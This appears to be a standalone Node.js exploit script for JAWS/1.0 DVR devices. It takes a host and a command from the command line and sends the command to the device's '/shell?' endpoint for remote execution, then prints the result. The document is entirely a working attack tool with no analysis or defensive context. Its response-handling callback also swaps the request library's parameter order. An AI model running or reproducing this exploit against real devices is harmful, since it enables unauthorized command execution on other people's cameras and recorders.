jaws-exploit/exploit.js

DVR exploit for JAWS/1.0, command execution

#! /usr/bin/env node
const request = require('request')
const program = require('commander')

program
  .version('1.0.0')
  .usage('host command')
  .parse(process.argv)

if (!program.args.length) {
  program.help()
} else {
  var target = 'http://' + program.args[0] + '/shell?' + program.args[1]
  request(target, (err, body, response) => {
    if (err) {
      console.log(err)
    }
    if(response.statusCode === 200) {
      console.log(body)
    } else {
      console.log(response)
    }
  })
}